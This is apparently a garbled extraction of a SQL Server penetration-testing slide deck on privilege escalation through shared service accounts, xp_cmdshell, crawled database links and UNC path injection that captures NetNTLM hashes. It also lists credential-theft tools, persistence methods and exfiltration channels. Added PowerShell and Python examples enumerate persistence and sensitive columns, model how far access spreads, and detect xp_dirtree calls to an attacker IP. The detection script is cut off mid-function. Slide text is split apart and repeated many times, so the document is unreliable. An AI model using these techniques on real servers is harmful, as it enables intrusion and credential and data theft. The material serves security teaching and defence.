   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
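Steps 1 and 2 above as an added PowerShell example (not code from the PowerUpSQL deck or project). It runs the sysadmin-level queries a responder, or an attacker checking for other attackers, uses to list the SQL-layer persistence named above, then sweeps column names across all user databases for the "identify sensitive data" step, ordered by table size. The server DB1 is hypothetical; the connection uses Windows authentication and targets master so that OBJECTPROPERTY resolves the startup procedures.

```powershell
# Added example, not code from the PowerUpSQL deck. Hypothetical server name.

function Invoke-SqlQuery([string]$ConnectionString, [string]$Query) {
    $table = New-Object System.Data.DataTable
    $da = New-Object System.Data.SqlClient.SqlDataAdapter $Query, $ConnectionString
    [void]$da.Fill($table)      # Fill opens and closes the connection itself
    return ,$table
}

function Get-SqlPersistence([string]$ConnectionString) {
    # Startup procedures live in master; server-level triggers and Agent jobs are
    # instance-wide. FOR XML PATH entity-escapes <, > and & in job commands.
    $q = @"
SELECT 'startup_proc' AS kind, p.name AS name, OBJECT_DEFINITION(p.object_id) AS detail
  FROM master.sys.procedures p
 WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1
UNION ALL
SELECT 'server_trigger', t.name, m.definition
  FROM sys.server_triggers t
  JOIN sys.server_sql_modules m ON m.object_id = t.object_id
UNION ALL
SELECT 'agent_job', j.name,
       STUFF((SELECT '; ' + s.subsystem + ': ' + s.command
                FROM msdb.dbo.sysjobsteps s
               WHERE s.job_id = j.job_id
               ORDER BY s.step_id FOR XML PATH('')), 1, 2, '')
  FROM msdb.dbo.sysjobs j
 WHERE j.enabled = 1
"@
    (Invoke-SqlQuery $ConnectionString $q).Rows | Select-Object kind, name, detail
}

function Find-SqlColumnsByKeyword([string]$ConnectionString,
        [string[]]$Keywords = @('ssn', 'social', 'card', 'ccn', 'cvv', 'password', 'passwd')) {
    # sp_MSforeachdb repeats the search in every database; DB_ID() > 4 skips
    # master, tempdb, model and msdb. Keywords are caller constants, and their
    # quotes are doubled because the search runs inside an N'...' literal.
    $like = ($Keywords | ForEach-Object { "c.name LIKE '%$_%'" }) -join ' OR '
    $q = @"
CREATE TABLE #cols (db sysname, schema_name sysname, table_name sysname,
                    column_name sysname, type_name sysname, row_count bigint);
EXEC sp_MSforeachdb N'USE [?];
IF DB_ID() > 4
INSERT #cols
SELECT DB_NAME(), s.name, t.name, c.name, ty.name,
       (SELECT SUM(ps.row_count) FROM sys.dm_db_partition_stats ps
         WHERE ps.object_id = t.object_id AND ps.index_id IN (0, 1))
  FROM sys.columns c
  JOIN sys.tables  t  ON t.object_id = c.object_id
  JOIN sys.schemas s  ON s.schema_id = t.schema_id
  JOIN sys.types   ty ON ty.user_type_id = c.user_type_id
 WHERE $($like -replace "'", "''")';
SELECT * FROM #cols ORDER BY row_count DESC, db, schema_name, table_name;
"@
    (Invoke-SqlQuery $ConnectionString $q).Rows |
        Select-Object db, schema_name, table_name, column_name, type_name, row_count
}

$cs = 'Server=DB1;Database=master;Integrated Security=True;'
Get-SqlPersistence -ConnectionString $cs | Format-Table -AutoSize -Wrap
Find-SqlColumnsByKeyword -ConnectionString $cs | Format-Table -AutoSize
```

The persistence query is the same whether you are planting or hunting: a startup procedure or a logon trigger that calls xp_cmdshell, or an Agent job with a CmdExec or PowerShell step, shows up in the detail column. The column sweep only matches names; sampling the rows with regular expressions and a Luhn check, as the slide suggests, is the step that separates a real card-number column from a false positive.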
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet, DMZ (ports 80 and 443), Intranet (ports 1433 and 1434) with ADS, LRA, HVA and LVA servers. Step 1: SQL injection against the LVA. Step 2: execute local command via xp_cmdshell. Step 3: access to the HVA with the shared domain service account; execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
- The public role can use links to execute queries on remote servers (impersonation):
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
- Stored procedures can be executed (xp_cmdshell)
- Links can be crawled
[Diagram: Leveraging MS SQL Database Links. Zones: Internet, DMZ (ports 80 and 443), Intranet (ports 1433 and 1434) with ADS, LRA, HVA and LVA servers. Step 1: SQL injection against DB1 (LVA). DB1 has a DB link with least privileges to one server and a DB link with the SA account to another. Step 2: execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen.
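The shared service account slides and the database link slides compose: a least-privilege link is still crawlable, an SA-mapped link hands over sysadmin on the remote server, and sysadmin on any host that shares a service account is sysadmin on all of them. The blast-radius model below is an added example written for this page, not PowerUpSQL code; the server inventory, service account names and links are constructed.

```python
"""Blast-radius model for shared SQL Server service accounts and database links.

Added example (not PowerUpSQL code). The inventory is constructed; in a real
assessment it would come from the service-account inventory (SPNs/services)
and from sys.servers / sys.linked_logins on each instance.
"""
from collections import deque

# Constructed inventory: host -> service account and business value.
SERVERS = {
    "DB1":     {"svc": "CORP\\svc_sql_shared",  "value": "LVA"},
    "DB2":     {"svc": "CORP\\svc_sql_shared",  "value": "LVA"},
    "HVA1":    {"svc": "CORP\\svc_sql_shared",  "value": "HVA"},
    "HVA2":    {"svc": "CORP\\svc_sql_hva2",    "value": "HVA"},
    "REPORTS": {"svc": "CORP\\svc_sql_reports", "value": "LVA"},
}

# Constructed linked-server inventory:
# (source, target, remote login the link is mapped to, remote login is sysadmin).
LINKS = [
    ("DB2",     "REPORTS", "reports_ro", False),  # link with least privileges
    ("REPORTS", "HVA2",    "sa",         True),   # link configured with the SA account
    ("HVA2",    "DB1",     "sa",         True),
]

RANK = {"login": 0, "sysadmin": 1}  # "login" = public-role access only


def blast_radius(start, start_level, servers=SERVERS, links=LINKS):
    """Return {host: (level, path)} for every host reachable from `start`.

    Two rules from the slides drive the crawl:
    - sysadmin runs OS commands as the service account, so sysadmin on one host
      is sysadmin on every host that shares that account;
    - any login can use a link (the public role can), and a link whose remote
      login is sysadmin hands over sysadmin on the target; other links give
      login-level access, which is still enough to keep crawling.
    """
    best = {start: (start_level, [start])}
    queue = deque([start])

    def offer(host, level, path):
        # Record a host only when this route gives a higher level than any known one.
        if host not in best or RANK[level] > RANK[best[host][0]]:
            best[host] = (level, path)
            queue.append(host)

    while queue:
        host = queue.popleft()
        level, path = best[host]
        if level == "sysadmin":
            acct = servers[host]["svc"]
            for other, info in servers.items():
                if other != host and info["svc"] == acct:
                    offer(other, "sysadmin", path + [f"shared account {acct}", other])
        for src, dst, login, remote_is_sa in links:
            if src == host:
                offer(dst, "sysadmin" if remote_is_sa else "login",
                      path + [f"link as {login}", dst])
    return best


def exposed_hvas(start, start_level="login", servers=SERVERS, links=LINKS):
    """High-value hosts on which `start` ends up with sysadmin."""
    reach = blast_radius(start, start_level, servers, links)
    return sorted(h for h, (lvl, _) in reach.items()
                  if servers[h]["value"] == "HVA" and lvl == "sysadmin")


def escalation_path(start, start_level, target, servers=SERVERS, links=LINKS):
    """Hop-by-hop route used to reach `target`, or None if unreachable."""
    reach = blast_radius(start, start_level, servers, links)
    return reach[target][1] if target in reach else None


if __name__ == "__main__":
    for host, lvl in (("DB1", "login"), ("DB2", "login"), ("DB1", "sysadmin")):
        print(f"{host} at {lvl}: HVAs with sysadmin -> {exposed_hvas(host, lvl)}")
    print(" -> ".join(escalation_path("DB2", "login", "HVA1")))
```

Run from DB2 with only public-role access, the crawl reaches both high-value servers, which is the case for auditing every SA-mapped link and every service account used by more than one instance.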
Escalating Privileges: UNC Path Injection
- UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
- Almost all procedures that accept a file path in SQL Server support UNC paths
- UNC paths can be used to force the SQL Server service account to authenticate to an attacker
- An attacker can then capture the NetNTLM password hash and crack or relay it
- Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT, the PUBLIC role can execute (at least) two procedures that accept a file path:
- xp_dirtree
- xp_fileexists
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account's NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
Escalating Privileges: UNC Path Injection
DEMO
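Detection side of the UNC path injection slides: flag calls to xp_dirtree or xp_fileexists whose path points the service account at a host that is not a known file server, rated higher when the caller is not sysadmin (the PUBLIC-role case above). Added example, not PowerUpSQL code; the log lines, logins, hosts and the tab-separated audit format are constructed.

```python
"""Detection for UNC path injection attempts via file-path procedures.

Added example, not PowerUpSQL code. It runs over constructed audit-style log
lines (tab-separated: time, login, is_sysadmin flag, statement), the shape a
SQL Server Audit or Extended Events export could be flattened into.
"""
import re

# The two procedures the slide names as executable by PUBLIC by default.
FILE_PATH_PROCS = ("xp_dirtree", "xp_fileexists")
# Constructed allowlist of file servers the service account is expected to reach.
SANCTIONED_FILE_SERVERS = {"fileserver01.corp.local"}

# Procedure name followed by its first quoted argument (optionally an N'...' literal).
PROC_RE = re.compile(
    r"\b(?P<proc>" + "|".join(FILE_PATH_PROCS) + r")\b\s*N?'(?P<path>[^']*)'",
    re.IGNORECASE,
)

SAMPLE_LOG = [  # constructed sample lines
    "\t".join(["2016-10-03T14:02:11Z", r"CORP\jdoe", "0",
               r"EXEC master..xp_dirtree '\\10.0.0.9\share'"]),
    "\t".join(["2016-10-03T14:02:45Z", r"CORP\svc_backup", "1",
               r"EXEC master.dbo.xp_fileexists N'\\fileserver01.corp.local\backups\full.bak'"]),
    "\t".join(["2016-10-03T14:03:02Z", r"CORP\jdoe", "0",
               r"exec master..xp_dirtree '//10.0.0.9/x'"]),
    "\t".join(["2016-10-03T14:05:00Z", r"CORP\app_user", "0",
               "SELECT name FROM sys.tables;"]),
    "\t".join(["2016-10-03T14:06:10Z", r"CORP\jdoe", "0",
               r"EXEC master..xp_dirtree 'C:\inetpub\wwwroot'"]),
    "\t".join(["2016-10-03T14:07:30Z", r"CORP\dba_admin", "1",
               r"EXEC master..xp_dirtree '\\10.0.0.9\c$', 1, 1"]),
    "\t".join(["2016-10-03T14:09:12Z", r"CORP\app_user", "0",
               r"EXECUTE master.dbo.XP_FILEEXISTS N'\\WS0042\share\x'"]),
]


def unc_host(path):
    """Host part of a UNC path (backslash or forward-slash form), else None."""
    p = path.strip().replace("/", "\\")
    if not p.startswith("\\\\"):
        return None
    host = p[2:].split("\\", 1)[0].lower()
    return host or None


def parse_line(line):
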